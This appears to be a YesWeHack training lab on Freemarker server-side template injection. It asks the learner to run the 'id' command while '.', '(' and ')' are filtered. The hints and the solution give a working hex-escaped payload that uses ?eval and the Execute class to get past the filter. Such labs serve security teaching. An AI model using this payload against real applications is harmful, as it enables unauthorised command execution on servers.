Freemarker

Command execution with constraints

by YesWeHack
drag_indicator
info
drag_indicator
inputs
drag_indicator
inspect

Taking example on the training payload Command execution, you have to find a way to execute the same payload but without ., ) and ( .

Goal: Execute the id shell command

Hints

Hint #1
expand_more

A character like ., ) or ( has a hexadecimal code that can be used as a substitute for the actual character.

Hint #2
expand_more

?eval evaluates an expression in a string.

Hint #3
expand_more

Sometimes some letters are confused with codes, and must be put in hexadecimal code.

Solution

Read the solution
expand_more

The solution was to change the ., (, ) of the training payload Command execution by their hexadecimal codes. Which gives: ${'"freemarker\x2Etemplate\x2Eutility\x2EExecute"?new\x28\x29\x28"id"\x29'?eval}.

A problem arises, \x2EE is not understood as being a .. Then we must also transform the E of Execute, which gives: ${'"freemarker\x2Etemplate\x2Eutility\x2E\x45xecute"?new\x28\x29\x28"id"\x29'?eval}.

drag_indicator
waf
INPUT
OUTPUT
drag_indicator
code
drag_indicator
result